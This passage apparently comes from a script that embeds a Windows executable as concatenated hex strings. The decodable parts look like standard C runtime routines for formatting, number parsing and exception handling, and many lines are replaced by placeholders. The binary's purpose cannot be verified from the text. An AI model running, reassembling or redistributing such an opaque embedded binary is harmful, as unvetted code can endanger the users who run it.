'fff0f85cd09000083cb08899df0fbffffe9bf09000083cb04899df0fbffff' \
'e9ab09000083cb01ebf081cb80000000ebe883cb02ebe36a2a58663bc8752' \
'<KEY>' \
'899df0fbffff8985dcfbffffe9620900008b85dcfbffff6bc00a8985dcfbf' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'8fbffffe9d20800000fb7c183f849745783f86874486a6c593bc1741a83f8' \
'<KEY>' \
'<KEY>' \
'ffff6a20580bd8e9bdfeffff8b85f8fbffff0fb70083f83675238bbdf8fbf' \
'fff66837f023475168bc783c0048985f8fbffff81cb00800000e97efeffff' \
'83f83375238bbdf8fbffff66837f023275168bc783c0048985f8fbffff81e' \
'3ff7fffffe956feffff663b8584fbffff0f840d080000663b8580fbffff0f' \
'8400080000663b8598fbffff0f84f307000083f8750f84ea07000083f8780' \
'f84e1070000663b858cfbffff0f84d407000033c08985ccfbffff8d85e0fb' \
'ffff50ffb5d8fbffffc785d0fbffff0100000051e866faffff83c40ce9a10' \
'700000fb7c183f8640f8f2b0200000f84b302000083f8530f8f2701000074' \
'7d83e8417410484874584848740848480f859c0500006a205803c8c785a0f' \
'bffff01000000898de4fbffff8b85e8fbffff83cb40ba00020000899df0fb' \
'ffff8db5fcfbffff8995ecfbffff85c00f8990020000c785e8fbffff06000' \
'000e9e1020000f7c3300800000f85da0000006a20580bd8899df0fbffffe9' \
'ca000000f7c330080000750b6a20580bd8899df0fbffff8b85e8fbffffbff' \
'fffff7f83f8ff74028bf88bb5f4fbffff83c60489b5f4fbffff8b76fcf6c3' \
'200f84c104000085f675068b35486c420033c98bc68bd18985e4fbffff899' \
'5ecfbffff85ff0f8ed00400008a0084c00f84c60400008d8db4fbffff0fb6' \
'c05150e8ed7affff5985c08b85e4fbffff597401408b95ecfbffff4042898' \
'5e4fbffff8995ecfbffff3bd77cc1e98c04000083e8580f84dc0200004848' \
'0f848b00000083e8070f84ebfeffff48480f856a0400000fb70783c704c78' \
'5d0fbffff0100000089bdf4fbffff89859cfbfffff6c32074448885c4fbff' \
'ff33c08885c5fbffff8d85b4fbffff508b85b4fbffffff70748d85c4fbfff' \
'f508d85fcfbffff50e81638000083c41085c07913c785b0fbffff01000000' \
'eb07668985fcfbffff33d28db5fcfbffff42e9ea0300008b0783c70489bdf' \
'4fbffff85c074368b700485f6742ff7c30008000074170fbf00992bc28bd0' \
'c785d0fbffff01000000e9b30300000fbf1033c9898dd0fbffffe9a503000' \
'08b35486c420056e839a9ffff598bd0e99103000083f8700f8feb0100000f' \
'84d701000083f8650f8c7f03000083f8670f8eeffdffff6a69593bc174668' \
'3f86e74276a6f593bc10f855f030000c785e4fbffff0800000084db795b81' \
'cb00020000899df0fbffffeb4d83c70489bdf4fbffff8b7ffce8db90ffff8' \
'5c00f84520500008b85e0fbfffff6c3207405668907eb028907c785b0fbff' \
'ff01000000e9c304000083cb40899df0fbffffc785e4fbffff0a000000f7c' \
'300800000750cf7c3001000000f84970100008b0f83c70889bdf4fbffff8b' \
'7ffce9b001000075146a6758663bc87556c785e8fbffff01000000eb4a3bc' \
'27e088bc28985e8fbffff3da30000007e378db85d01000057e8b7daffff59' \
'8b8de4fbffff8985a8fbffff85c0740a8bf089bdecfbffffeb0ac785e8fbf' \
'fffa30000008bbdf4fbffff8b0783c708898578fbffff8b47fc89857cfbff' \
'ff8d85b4fbffff50ffb5a0fbffff0fbec1ffb5e8fbffff89bdf4fbffff50f' \
'fb5ecfbffff8d8578fbffff5650ff35786e4200ff15f8a14100ffd08bfb83' \
'c41c81e780000000742183bde8fbffff0075188d85b4fbffff5056ff35846' \
'e4200ff15f8a14100ffd059596a6758663985e4fbffff751c85ff75188d85' \
'b4fbffff5056ff35806e4200ff15f8a14100ffd05959803e2d0f851efefff' \
'f81cb00010000899df0fbffff46e90cfeffffc785e8fbffff080000006a07' \
'eb1c83e8730f8479fcffff48480f8492feffff83e8030f85890100006a275' \
'88985acfbffffc785e4fbffff1000000084db0f8978feffff6a305983c051' \
'66898dc8fbffff668985cafbffffc785d4fbffff02000000e955feffff83c' \
'70489bdf4fbfffff6c3207411f6c34074060fbf47fceb0e0fb747fceb08f6' \
'c340740c8b47fc998bc88bfa33c0eb078b4ffc33c08bf8f6c340741c3bf87' \
'f187c043bc87312f7d913f8f7df81cb00010000899df0fbfffff7c3009000' \
'0075028bf88b95e8fbffff85d2790533d242eb1683e3f7899df0fbffff81f' \
'a000200007e05ba000200008bc10bc775068985d4fbffff8db5fbfdffff8b' \
'c24a8995e8fbffff85c07f068bc10bc7743d8b85e4fbffff9952505751e80' \
'92c000083c130899d94fbffff8985ecfbffff8bfa83f9397e06038dacfbff' \
'ff8b95e8fbffff880e8b8decfbffff4eebb08b9df0fbffff8d95fbfdffff2' \
'bd6468995ecfbfffff7c300020000744585d27405803e30743c4e6a305888' \
'0642eb2d85f675068b354c6c4200c785d0fbffff010000008bd685ff740f3' \
'3c04f663902740783c20285ff75f32bd6d1fa8995ecfbffff83bdb0fbffff' \
'000f85ad010000f6c3407420f7c3000100000f841d0100006a2d58668985c' \
'8fbffffc785d4fbffff010000006a20598bbddcfbffff8b85d4fbffff2bfa' \
'2bf8f6c30c751d8d85e0fbffff50ffb5d8fbffff5751e868f4ffff8b85d4f' \
'bffff83c410ffb5a4fbffff8d8de0fbffff51ffb5d8fbffff508d85c8fbff' \
'ff50e80c02000083c414f6c308741ff6c304751a8d85e0fbffff50ffb5d8f' \
'bffff576a305850e81bf4ffff83c41083bdd0fbffff008b85ecfbffff0f85' \
'b300000085c00f8eab0000008bce89b5e4fbffff48898594fbffff8d85b4f' \
'bffff508b85b4fbffffff70748d859cfbffff5150e80933000083c4108985' \
'88fbffff85c07e678d85e0fbffff50ffb5d8fbffffffb59cfbffffe876f3f' \
'fff8b8de4fbffff038d88fbffff8b8594fbffff83c40c898de4fbffff85c0' \
'7f98eb56f6c30174076a2be9d9fefffff6c3020f84e2feffff6a205966898' \
'dc8fbffffc785d4fbffff01000000e9ccfeffff83c8ff8985e0fbffffeb23' \
'ffb5a4fbffff8d8de0fbffff51ffb5d8fbffff5056e80501000083c4148b8' \
'5e0fbffff85c0781ff6c304741a8d85e0fbffff50ffb5d8fbffff576a2058' \
'50e80ff3ffff83c4108b85a8fbffff85c0740f50e8b69cffff33c0598985a' \
'8fbffff8b95ecfbffff8b85f8fbffff0fb7088b85e0fbffff898de4fbffff' \
'6685c90f8554f5ffff8b8dccfbffff85c9740583f907754e80bdc0fbffff0' \
'0740a8b8dbcfbffff836170fd8b4dfc5f5e33cd5be8ed72ffffc9c3e80ebc' \
'ffffc70016000000e894bbffff80bdc0fbffff000f849cf4ffff8b8dbcfbf' \
'fff836170fde98df4ffffe8e2bbffffc70016000000e868bbffff80bdc0fb' \
'ffff00e965f4ffff8d490053454100fd4241003143410086434100e543410' \
'0f24341004d44410078454100558bec568b7518578b7d108b06f6470c4089' \
'45187410837f0800750a8b4d148b450c0101eb4f832600538b5d0c85db7e4' \
'18b4514508b4508570fb700504be8baf1ffff8b45148345080283c40c8338' \
'ff7514833e2a751350576a3fe89df1ffff8b451483c40c85db7fca833e007' \
'5058b451889065b5f5e5dc36a03e8070900005983f80174156a03e8fa0800' \
'005985c0751f833d6877420001751668fc000000e83400000068ff000000e' \
'82a0000005959c3558bec8b4d0833c03b0cc5f0c54100740a4083f81772f1' \
'33c05dc38b04c5f4c541005dc3cccccc558bec81ecfc010000a1606342003' \
'3c58945fc568b75085756e8bbffffff8bf85985ff0f8479010000536a03e8' \
'7d0800005983f8010f840f0100006a03e86c0800005985c0750d833d68774' \
'200010f84f600000081fefc0000000f84410100006804c741006814030000' \
'6870774200e8afbaffff83c40c33db85c00f852f010000680401000068a27' \
'742005366a3aa794200ff1544a14100befb02000085c0751b6838c7410056' \
'68a2774200e872baffff83c40c85c00f85f400000068a2774200e8df24000' \
'0405983f83c763568a2774200e8ce2400008d0c452c7742008bc12da27742' \
'006a03d1f86868c741002bf05651e8c724000083c41485c00f85ae0000006' \
'870c741006814030000be7077420056e82224000083c40c85c00f858e0000' \
'0057681403000056e80b24000083c40c85c0757b68102001006878c741005' \
'6e86432000083c40ceb576af4ff15cca041008bf085f6744983feff744433' \
'db8bcb8a044f88840d08feffff66391c4f74094181f9f401000072e7538d8' \
'504feffff508d8508feffff50885dfbe89da0ffff59508d8508feffff5056' \
'ff1504a141005b8b4dfc5f33cd5ee8f96fffffc9c35353535353e8b6b8fff' \
'<KEY>' \
'5dc3e88d29000085c074086a16e8ab29000059f605c06d42000274216a17e' \
'8ed39000085c074056a0759cd296a0168150000406a03e8f3b6ffff83c40c' \
'6a03e83dd4ffffcc558bec8b4508a3987d42005dc3558bec83ec348d4dccf' \
'<KEY>' \
'1485c0741f83f8027c0583f8247e15e869b8ffffc70016000000e8efb7fff' \
'fe9680200000fb7198bfa6a08538955fc897dec895df48d7102e8abb1ffff' \
'595985c0741d0fb73e6a0857897df483c602e894b1ffff595985c075e98b7' \
'dec8b5df48b45186683fb2d750583c802eb066683fb2b75090fb71e83c602' \
'895df48945f88b451485c00f88f501000083f8010f84ec01000083f8240f8' \
'fe301000085c0753053e8923200005985c074086a0a58894514eb4d0fb706' \
'6a7859663bc1740c6a5859663bc174046a08ebe36a105889451483f810752' \
'b53e85d3200005985c0751d0fb7066a7859663bc174086a5859663bc1750a' \
'0fb75e02895df483c6048b4514998bca51506aff6aff8945dc894de0e8a72' \
'40000895de88b5df4894de48945f08955ec53e80f320000598bc88945f483' \
'f9ff75576a4158663bc377066683fb5a76326a198d439f59663bc1762a8b4' \
'5fc8b5df88b4d1083ee02f6c3080f859300000085c974038b750c33d28bc2' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'df885c97488eb1a5750ff75e0ff75dce8fe3200000345f46a008945fc8bfa' \
'5813f80fb71e83c602e92efffffff6c3047533f6c30175658bcb83e102741' \
'281ff00000080771f720833d23bc27717eb0233d285c9754181ffffffff7f' \
'7239770583f8ff7632e84ab6ffffc70022000000f6c301740883c8ff83cff' \
'feb22f6c302740b33d28bc2bf00000080eb1483c8ffbfffffff7feb088b45' \
'fceb058b45fc33d28b4d1085c974028931f6c302741af7d813faf7dfeb128' \
'b451085c074058b4d0c890833c98bc18bf9807dd80074078b4dd4836170fd' \
'<KEY>' \
'<KEY>' \
'6de0752583781003751f8b40143d20059319741b3d2105931974143d22059' \
'319740d3d00409901740633c05dc20400e810070000cc68d4534100e895ba' \
'ffff5933c0c3ff1520a1410033c985c00f95c1a39c7d42008bc1c3558bec5' \
'1515356576804010000bba07d42005333c033ff5766a3a87f4200ff1544a1' \
'<KEY>' \
'<KEY>' \
'ff7f73418d0c5803c903c03bc8723651e8b7ceffff8bf85985ff74298d45f' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'c7450820000000c745fc090000006a2258663901751133c085ff0f94c06a2' \
'283c1028bf858eb1aff0385d27409668b0166890283c2020fb70183c10266' \
'<KEY>' \
'b0383e9028b7d1833db895df86639190f84df0000000fb701663b45087406' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'6dffffff8975f88b750c85d2740833c066890283c202ff0733dbe918fffff' \
'f85f67402891e8b45145fff005e5bc9c353568b359874420033db578bfb85' \
'f6751b83c8ffe9a1000000663bc174014756e8c11d00008d34465983c6020' \
'fb7066a3d596685c075e28d47016a0450e866ccffff8bf85959893d5c7742' \
'0085ff74c18b359874420066391e744456e8851d0000596a3d8d580158663' \
'90674226a0253e833ccffff5959890785c07441565350e8dfb2ffff83c40c' \
'85c0754983c7048d345e33db66391e75c28b359874420056e8b092ffff891' \
'd98744200891fc705cc8042000100000033c0595f5e5bc3ff355c774200e8' \
'8c92ffff83255c7742000083c8ffebe433c05050505050e8d0b1ffffcc558' \
'<KEY>' \
'<KEY>' \
'016000000e877b1ffff83c8ff5dc3558bec83ec14a1606342008365f40083' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'75f02bf783c60256e8b2caffff598945fc85c0740e565750e8cf91ffff8b5' \
'<KEY>' \
'<KEY>' \
'b3085f675014656ff75086a00ff359c7d4200ff15d8a141008bd885db755e' \
'3905f87f4200744056e852b2ffff5985c0741d83fee076cb56e842b2ffff5' \
'9e83fb0ffffc7000c00000033c05b5e5dc3e82eb0ffff8bf0ff15c0a04100' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'f4110660f7f4120660f7f4130660f7f4140660f7f4150660f7f4160660f7f' \
'<KEY>' \
'18d49104b75f683e20f741c8bdac1ea02740a660f7e018d49044a75f683e3' \
'<KEY>' \
'a75fac1eb02740a660f7e018d49044b75f65ae95effffff558bec568b7508' \
'85f674108b550c85d274098b4d1085c97516880ee819afffff6a165e8930e' \
'8a0aeffff8bc65e5dc3578bfe2bf98a0188040f4184c074034a75f35f85d2' \
'750b8816e8ecaeffff6a22ebd133c0ebd7cccccc558bec83ec0453518b450' \
'c83c00c8945fc8b450855ff75108b4d108b6dfce8692c00005657ffd05f5e' \
'8bdd5d8b4d10558beb81f9000100007505b90200000051e8472c00005d595' \
'bc9c20c006a0868202f4200e868c1ffffff35b07f4200ff15f8a1410085c0' \
'74168365fc00ffd0eb0733c040c38b65e8c745fcfeffffffe801000000cc6' \
'a0868002f4200e830c1ffffe87ca9ffff8b407885c074168365fc00ffd0eb' \
'0733c040c38b65e8c745fcfeffffffe835f5ffffcce854a9ffff8b407c85c' \
'07402ffd0e9b9ffffff68245b4100ff15f4a14100a3b07f4200c36a0868b0' \
'2f4200e8d8c0ffff8b450885c07472813863736de0756a837810037564817' \
'8142005931974128178142105931974098178142205931975498b481c85c9' \
'74428b510485d274278365fc0052ff7018e80e99ffffc745fcfeffffffeb2' \
'533c038450c0f95c0c38b65e8e837fffffff60110740f8b40188b0885c974' \
'<KEY>' \
'741008bc65e5dc20400c701ccc74100e9a195ffff558bec568bf1c706ccc7' \
'4100e89095fffff6450801740756e80a64ffff598bc65e5dc204006a30686' \
'82f4200e802c0ffff8b45188945e433db895dc88b7d0c8b47fc8945d88b75' \
'08ff76188d45c050e83e9affff59598945d4e826a8ffff8b8088000000894' \
'5d0e818a8ffff8b808c0000008945cce80aa8ffff89b088000000e8ffa7ff' \
'ff8b4d1089888c000000895dfc33c0408945108945fcff7520ff751cff751' \
'8ff751457e8aa97ffff83c4148945e4895dfce999000000ff75ece8ec0100' \
'0059c38b65e8e8b8a7ffff33db8998ac0300008b55148b7d0c817a0480000' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'0c72c151525357e87509000083c410895de4895dfc8b7508c745fcfefffff' \
'fc7451000000000e80e0000008bc7e80bbfffffc38b7d0c8b75088b45d889' \
'47fcff75d4e83a99ffff59e8fca6ffff8b4dd0898888000000e8eea6ffff8' \
'b4dcc89888c000000813e63736de07548837e10037542817e142005931974' \
'12817e14210593197409817e142205931975278b7de4837dc800752185ff7' \
'41dff7618e82f99ffff5985c07410ff751056e864fdffff5959eb038b7de4' \
'c36a04b8a68a4100e85395ffffe880a6ffff83b894000000007405e8adfcf' \
'fff8365fc00e810fdffffe864a6ffff8b4d086a006a00898894000000e839' \
'94ffffcc558bec837d2000578b7d0c7412ff7520ff751c57ff7508e80c060' \
'00083c410837d2c00ff7508750357eb03ff752ce8d997ffff568b7524ff36' \
'ff7518ff751457e8440800008b46046800010000ff7528408947088b451cf' \
'f700cff7518ff751057ff7508e889fdffff83c42c5e85c074075750e86497' \
'ffff5f5dc3558bec8b45088b00813863736de075398378100375338178142' \
'0059319741281781421059319740981781422059319751883781c007512e8' \
'<KEY>' \
'<KEY>' \
'088945f883f8ff7c053b47047c05e889fbffff8b7508813e63736de00f85b' \
'a020000837e10030f850d010000817e14200593197416817e142105931974' \
'0d817e14220593190f85ee000000395e1c0f85e5000000e808a5ffff39988' \
'80000000f84b0020000e8f7a4ffff8bb088000000e8eca4ffff8b808c0000' \
'006a0156894508c645dc01e87d270000595985c07505e807fbffff813e637' \
'36de0752b837e10037525817e14200593197412817e14210593197409817e' \
'1422059319750a395e1c7505e8d4faffffe894a4ffff399894000000746ce' \
'887a4ffff8b80940000008945ece879a4ffffff75ec89989400000056e896' \
'030000595984c075448b7dec391f0f8e120200008bc3895d188b4f0468d06' \
'd42008b4c0804e80860ffff84c00f85f90100008b45184383c0108945183b' \
'1f7cd9e9e10100008b4510894508eb038b4508813e63736de00f858f01000' \
'0837e10030f8585010000817e14200593197416817e1421059319740d817e' \
'14220593190f8566010000395f0c0f86f20000008d45d8508d45f050ff75f' \
'<KEY>' \
'8955ec8d5af0895dd48b5d0c3942f00f8f9f0000003b42f40f8f960000008' \
'b3a897df48b7afc897de085ff8b7d180f8e800000008b4df48b461c8b400c' \
'8d50048b00eb23ff761c8b0250518945d0e85307000083c40c85c0752a8b4' \
'5e88b55e48b4df44883c2048945e88955e485c07fd38b45e04883c1108945' \
'e0894df485c07fb5eb27ff75dcc645ff01ff7524ff7520ff75d4ff75d0ff7' \
'<KEY>' \
'14894df08955ec3b4dd80f823cffffff33db807d1c00740a6a0156e8aaf9f' \
'fff5959807dff0075798b0725ffffff1f3d21059319726b837f1c007465ff' \
'771c56e8e6010000595984c07556e8afa2ffffe8aaa2ffffe8a5a2ffff89b' \
'088000000e89aa2ffff837d24008b4d0889888c00000056757aff750ceb78' \
'8b4510395f0c761f385d1c7531ff7524ff7520ff75f857ff751450ff750c5' \
'6e87300000083c420e859a2ffff3998940000007405e887f8ffff5f5e5bc9' \
'c3e8b5f8ffff6a0156e805f9ffff59598d4518508d4dc4c74518d4c74100e' \
'8df8effff68443042008d45c450c745c4ccc74100e8f78fffffff7524e8c3' \
'93ffff6aff57ff7514ff750ce83204000083c410ff771ce85efbffffcc558' \
'bec5151578b7d08813f030000800f84020100005356e8d2a1ffff83b88000' \
'0000008b5d1874486a00ff15f4a141008bf0e8b7a1ffff39b080000000743' \
'1813f4d4f43e07429813f524343e07421ff7524ff752053ff7514ff7510ff' \
'750c57e8c091ffff83c41c85c00f85a5000000837b0c007505e8aef7ffff8' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'8b7d08f6004075286a01ff75248d4ef4ff7520516a005053ff7514ff7510f' \
'<KEY>' \
'<KEY>' \
'b895d0c8b45088b401c8b400c8d50048b008955f88945fc85c07e358b4508' \
'ff701c8b4604ff3203c150e87d0400008b4d0c83c40c85c075168b45fc8b5' \
'5f84883c2048945fc8955f885c07fcfeb02b3014783c110894d0c3b3e7ca8' \
'5f5e8ac35bc9c3e88ff6ffffe8c2f6ffffcc558bec8b4d0c8b55088b01568' \
'b710403c285f6780d8b49088b14168b0c0a03ce03c15e5dc36a0868902f42' \
'00e8ccb7ffff8b55108b4d0cf7020000008074048bf9eb068d790c037a088' \
'365fc008b75145652518b5d0853e85700000083c41048741f4875346a018d' \
'460850ff7318e88dffffff595950ff761857e8ff8fffffeb188d460850ff7' \
'318e873ffffff595950ff761857e8e58fffffc745fcfeffffffe89db7ffff' \
'c333c040c38b65e8e80ff6ffffcc6a0c6828304200e83eb7ffff33db8b451' \
'08b480485c90f84610100003859080f84580100008b480885c9750cf70000' \
'0000800f84450100008b108b7d0c85d2780583c70c03f9895dfc6a01f6c20' \
'874428b7508ff7618e8e6210000595985c00f84fc0000006a0157e8d42100' \
'00595985c00f84ea0000008b4e18890f8b451483c0085051e8c4feffff595' \
'98907e9d40000008b75148b4508ff7018f60601744ee89c210000595985c0' \
'0f84b20000006a0157e88a210000595985c00f84a0000000ff76148b4508f' \
'f701857e80a69ffff83c40c837e14040f8589000000833f000f8480000000' \
'8d460850ff37eb96395e187539e849210000595985c074636a0157e83b210' \
'000595985c07455ff76148d4608508b4508ff7018e82ffeffff59595057e8' \
'b368ffff83c40ceb3ae810210000595985c0742a6a0157e80221000059598' \
'5c0741cff7618e8f42000005985c0740ff606046a005b0f95c343895de4eb' \
'05e870f4ffffc745fcfeffffff8bc3eb0e33c040c38b65e8e891f4ffff33c' \
'0e80bb6ffffc3558bec8b45088b008138524343e0742181384d4f43e07419' \
'813863736de0752ae8f19dffff83a09000000000e958f4ffffe8e09dffff8' \
'3b890000000007e0be8d29dffffff889000000033c05dc36a1068402f4200' \
'e86bb5ffff8b4510817804800000008b45087f060fbe7008eb038b7008897' \
'5e4e89c9dffffff80900000008365fc003b7514745f83feff7e088b45103b' \
'70047c05e8b6f3ffff8b4d108b41088b14f08955e0c745fc01000000837cf' \
'0040074278b45088950086803010000508b4108ff74f004e838f3ffffeb0d' \
'ff75ece829ffffff59c38b65e88365fc008b75e08975e4eb9cc745fcfefff' \
'fffe8190000003b75147405e853f3ffff8b4508897008e801b5ffffc38b75' \
'e4e8049dffff83b890000000007e0be8f69cffffff8890000000c3558bec5' \
'35657e8e49cffff8b4d188b550833f6bb63736de0bf2205931939b0ac0300' \
'007521391a741d813a2600008074158b0125ffffff1f3bc7720af64120010' \
'f8591000000f642046674213971040f848200000039751c757d6aff51ff75' \
'14ff750ce8bffeffff83c410eb6a39710c75138b0125ffffff1f3d2105931' \
'9725739711c7452391a7532837a1003722c397a1476278b421c8b700885f6' \
'741d0fb6452450ff7520ff751c51ff7514ff7510ff750c52ffd683c420eb1' \
'fff7520ff751cff752451ff7514ff7510ff750c52e892f6ffff83c42033c0' \
'<KEY>' \
'<KEY>' \
'027405f6060874f28b4510f600017405f6060174e5f600027405f6060274d' \
'<KEY>' \
'9069410064ff3500000000a16063420033c489442408648925000000008b4' \
'424308b58088b4c242c33198b700c83fefe743b8b54243483fafe74043bf2' \
'762e8d34768d5cb3108b0b89480c837b040075cc68010100008b4308e8c21' \
'd0000b9010000008b4308e8d41d0000ebb0648f050000000083c4185f5e5b' \
'c38b4c2404f7410406000000b80100000074338b4424088b480833c8e8a95' \
'6ffff558b6818ff700cff7010ff7014e83effffff83c40c5d8b4424088b54' \
'24108902b803000000c3558b4c24088b29ff711cff7118ff7128e815fffff' \
'f83c40c5dc20400555657538bea33c033db33d233f633ffffd15b5f5e5dc3' \
'8bea8bf18bc16a01e81f1d000033c033db33c933d233ffffe6558bec53565' \
'76a005268366a410051e86a2000005f5e5b5dc3558b6c24085251ff742414' \
'e8b5feffff83c40c5dc20800558bec568b750885f60f84ea0000008b460c3' \
'b05046e4200740750e8547fffff598b46103b05086e4200740750e8427fff' \
'ff598b46143b050c6e4200740750e8307fffff598b46183b05106e4200740' \
'750e81e7fffff598b461c3b05146e4200740750e80c7fffff598b46203b05' \
'186e4200740750e8fa7effff598b46243b051c6e4200740750e8e87effff5' \
'98b46383b05306e4200740750e8d67effff598b463c3b05346e4200740750' \
'e8c47effff598b46403b05386e4200740750e8b27effff598b46443b053c6' \
'e4200740750e8a07effff598b46483b05406e4200740750e88e7effff598b' \
'464c3b05446e4200740750e87c7effff595e5dc3558bec568b750885f6745' \
'98b063b05f86d4200740750e85d7effff598b46043b05fc6d4200740750e8' \
'4b7effff598b46083b05006e4200740750e8397effff598b46303b05286e4' \
'200740750e8277effff598b46343b052c6e4200740750e8157effff595e5d' \
'c3558bec568b750885f60f846e030000ff7604e8fa7dffffff7608e8f27df' \
'fffff760ce8ea7dffffff7610e8e27dffffff7614e8da7dffffff7618e8d2' \
'7dffffff36e8cb7dffffff7620e8c37dffffff7624e8bb7dffffff7628e8b' \
'37dffffff762ce8ab7dffffff7630e8a37dffffff7634e89b7dffffff761c' \
'e8937dffffff7638e88b7dffffff763ce8837dffff83c440ff7640e8787df' \
'fffff7644e8707dffffff7648e8687dffffff764ce8607dffffff7650e858' \
'7dffffff7654e8507dffffff7658e8487dffffff765ce8407dffffff7660e' \
'8387dffffff7664e8307dffffff7668e8287dffffff766ce8207dffffff76' \
'70e8187dffffff7674e8107dffffff7678e8087dffffff767ce8007dffff8' \
'3c440ffb680000000e8f27cffffffb684000000e8e77cffffffb688000000' \
'e8dc7cffffffb68c000000e8d17cffffffb690000000e8c67cffffffb6940' \
'00000e8bb7cffffffb698000000e8b07cffffffb69c000000e8a57cffffff' \
'b6a0000000e89a7cffffffb6a4000000e88f7cffffffb6a8000000e8847cf' \
'fffffb6b8000000e8797cffffffb6bc000000e86e7cffffffb6c0000000e8' \
'637cffffffb6c4000000e8587cffffffb6c8000000e84d7cffff83c440ffb' \
'6cc000000e83f7cffffffb6b4000000e8347cffffffb6d4000000e8297cff' \
'ffffb6d8000000e81e7cffffffb6dc000000e8137cffffffb6e0000000e80' \
'87cffffffb6e4000000e8fd7bffffffb6e8000000e8f27bffffffb6d00000' \
'00e8e77bffffffb6ec000000e8dc7bffffffb6f0000000e8d17bffffffb6f' \
'4000000e8c67bffffffb6f8000000e8bb7bffffffb6fc000000e8b07bffff' \
'ffb600010000e8a57bffffffb604010000e89a7bffff83c440ffb60801000' \
'0e88c7bffffffb60c010000e8817bffffffb610010000e8767bffffffb614' \
'010000e86b7bffffffb618010000e8607bffffffb61c010000e8557bfffff' \
'fb620010000e84a7bffffffb624010000e83f7bffffffb628010000e8347b' \
'ffffffb62c010000e8297bffffffb630010000e81e7bffffffb634010000e' \
'8137bffffffb638010000e8087bffffffb63c010000e8fd7affffffb64001' \
'0000e8f27affffffb644010000e8e77affff83c440ffb648010000e8d97af' \
'fffffb64c010000e8ce7affffffb650010000e8c37affffffb654010000e8' \
'b87affffffb658010000e8ad7affffffb65c010000e8a27affffffb660010' \
'000e8977affff83c41c5e5dc3558bec5151a16063420033c58945fc53568b' \
'<KEY>' \
'83bc68d70017c028bf08b4d2433ff85c9750d8b45088b008b40048945248b' \
'c833c03945286a000f95c06a0056ff75148d04c5010000005051ff15a4a14' \
'1008bc8894df885c9750733c0e9580100007e4b6ae033d258f7f183f80272' \
'3f8d0c4d0800000081f90004000077158bc1e8289bffff8bdc85db741ec70' \
'3cccc0000eb1351e8459affff8bd85985db7409c703dddd000083c3088b4d' \
'f8eb0233db85db74a6515356ff75146a01ff7524ff15a4a1410085c00f84e' \
'30000008b75f86a006a005653ff7510ff750ce8d00200008bf883c41885ff' \
'0f84c2000000b900040000854d10742c8b4d2085c90f84ad0000003bf90f8' \
'fa500000051ff751c5653ff7510ff750ce89502000083c418e98c00000085' \
'ff7e426ae033d258f7f783f80272368d047d080000003bc17713e8699afff' \
'f8bf485f67466c706cccc0000eb1350e88699ffff8bf05985f67451c706dd' \
'dd000083c608eb0233f685f674405756ff75f853ff7510ff750ce83002000' \
'083c41885c0742133c0505039452075045050eb06ff7520ff751c575650ff' \
'7524ff15bca141008bf856e8d853ffff5953e8d153ffff598bc78d65ec5f5' \
'e5b8b4dfc33cde83d4fffffc9c3558bec83ec10ff75088d4df0e8c64fffff' \
'ff75288d45f0ff7524ff7520ff751cff7518ff7514ff7510ff750c50e8e5f' \
'dffff83c424807dfc0074078b4df8836170fdc9c3558bec51a16063420033' \
'c58945fc8b4d1c53565733ff85c9750d8b45088b008b400489451c8bc833c' \
'03945205757ff75140f95c0ff75108d04c5010000005051ff15a4a141008b' \
'd885db750733c0e9870000007e4181fbf0ffff7f77398d045d080000003d0' \
'00400007713e82e99ffff8bf485f674d6c706cccc0000eb1350e84b98ffff' \
'8bf05985f674c1c706dddd000083c608eb028bf785f674b08d041b505756e' \
'8f777ffff83c40c5356ff7514ff75106a01ff751cff15a4a1410085c07410' \
'ff75185056ff750cff1530a241008bf856e8a152ffff598bc78d65f05f5e5' \
'b8b4dfc33cde80d4effffc9c3558bec83ec10ff75088d4df0e8964effffff' \
'75208d45f0ff751cff7518ff7514ff7510ff750c50e8e8feffff83c41c807' \
'<KEY>' \
'2bc28bf0d1fe6a55ff34f548de4100ff7508e89c00000083c40c85c074137' \
'9058d5effeb038d7e013bfb7ed083c8ffeb078b04f54cde41005f5e5b5dc3' \
'558bec837d0800741dff7508e8a1ffffff5985c078103de400000073098b0' \
'4c528d741005dc333c05dc3558beca14c814200330560634200741b33c951' \
'5151ff751cff7518ff7514ff7510ff750cff7508ffd05dc3ff751cff7518f' \
'f7514ff7510ff750cff7508e894ffffff5950ff159ca041005dc3558bec56' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'c42500f0ffff3bc8720a8bc159948b00890424c32d001000008500ebe9558' \
'bec56578b7d0885ff74138b4d0c85c9740c8b551085d2751a33c0668907e8' \
'7295ffff6a165e8930e8f994ffff8bc65f5e5dc38bf766833e00740683c60' \
'24975f485c974d42bf20fb702668904168d52026685c074034975ee33c085' \
'c975d0668907e82e95ffff6a22ebba558bec8b4508668b0883c0026685c97' \
'<KEY>' \
'752633c0eb3385c9741e8b450c85c0741785d2750733c0668901ebe68b751' \
'085f6751933c0668901e8cf94ffff6a165e8930e85694ffff8bc65e5dc353' \
'<KEY>' \
'<KEY>' \
'66890385ff5f5b0f857bffffff83faff750f8b450c33d26a5066895441fe5' \
'8eb9e33c0668901e85794ffff6a22eb86558bec8b4d0883f9fe750de84394' \
'ffffc70009000000eb3885c978243b0dd0804200731c8bc1c1f80583e11f8' \
'b0485e0744200c1e1060fbe44080483e0405dc3e80e94ffffc70009000000' \
'e89493ffff33c05dc3558bec83ec10538b5d0c578b7d1085db751285ff740' \
'e8b450885c0740383200033c0eb7f8b450885c074038308ff5681ffffffff' \
'7f7611e8c393ffff6a165e8930e84a93ffffeb58ff75188d4df0e8204bfff' \
'f8b45f033f639b0a80000007560668b4514b9ff000000663bc1763985db74' \
'0f85ff740b575653e80074ffff83c40ce87993ffffc7002a000000e86e93f' \
'fff8b30807dfc0074078b4df8836170fd8bc65e5f5bc9c385db740685ff74' \
'5f88038b450885c074dbc70001000000ebd38d4d0c515657536a018d4d145' \
'<KEY>' \
'a78908eba3ff15c0a0410083f87a758685db740f85ff740b575653e87373f' \
